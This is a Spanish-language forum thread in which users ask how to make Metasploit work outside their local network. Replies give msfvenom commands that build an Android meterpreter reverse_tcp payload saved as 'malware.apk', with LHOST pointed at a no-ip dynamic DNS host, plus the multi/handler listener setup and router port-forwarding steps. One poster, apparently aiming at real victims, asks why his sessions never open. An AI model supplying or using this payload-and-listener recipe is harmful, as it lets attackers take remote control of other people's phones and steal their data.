metasploit-msfvenom fuera de red (no-ip2)

Iniciado por korvo, 28 Enero 2017, 15:48 PM

0 Miembros y 1 Visitante están viendo este tema.

korvo

Buenas, puesto que siempre he usado metasploit en red local con maquinas virtuales no se como usarlo fuera de dicha red, con otras herramientas he usado no-ip2  pero con metasploit asignando el host a lhost y escuchando con multi/handler no abre sesion

msfvenom -p android/meterpreter/reverse_tcp lhost=<host-noip2> lport=<puerto_NAT_abierto> -o /root/Escritorio/malware.apk


handler>>> set lhost <host-noip2>
handler>>> set lport <puerto>
handler>>> set payload android/meterpreter/reverse_tcp
handler>>> exploit


He leído en diferentes foros que debes cambiar lhost por srvhost o rhosts lo cual tampoco me da resultado alguno, en otros dicen que hay que indicar la IP publica ( https://foro.elhacker.net/bugs_y_exploits/seguridad_usando_metasploit_iquestvpnnoip-t458179.0.html;msg2093776;topicseen ) ¿Me podrían indicar como hacerlo correctamente? y en tal caso, ¿qué diferencia hay entre lhost, srvhost y rhosts?
Gracias por su tiempo

GUMEGA02

Primero que nada creo que es necesario saber si esta funcionando correctamente tu NO-IP, puedes habilitar en Kali linux el servicio de apache y abrir el puerto 80 en tu router y ver si accedes con el dominio a NO-IP, si puedes acceder sin ningun problema puedes intentar configurar tu metasploit de la siguiente manera

msfvenom -p android/meterpreter/reverse_tcp lhost=nombre.ddns.net lport=4455 > /root/Escritorio/malware.apk

service postgresql start
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.20   -------------- Aqui pon la ip local de tu kali
set lport 4455
exploit


para ello deberas tener en tu router abierto el puerto 4455 apuntando a tu direccion local, en este caso la máquina en donde tienes configurado el NO-IP.

comenta si te funciono!!

Carder_CVC

man, ahi en msfvenom -p android/meterpreter/reverse_tcp lhost=

para usar eso fuera de la red debo poner el nombre de mi router mas ddns.net eso fue lo que entendi.

ya eh usado metasploit pero eh puesto la ip de la terminal.por ejemplo lhost=182.168.35 lport=4444 eso e usado y me a funciomado dentro de la red, lo intente usar fuera de la red pero la sesion nunca se abrio. que puedo hacer man,Help me!!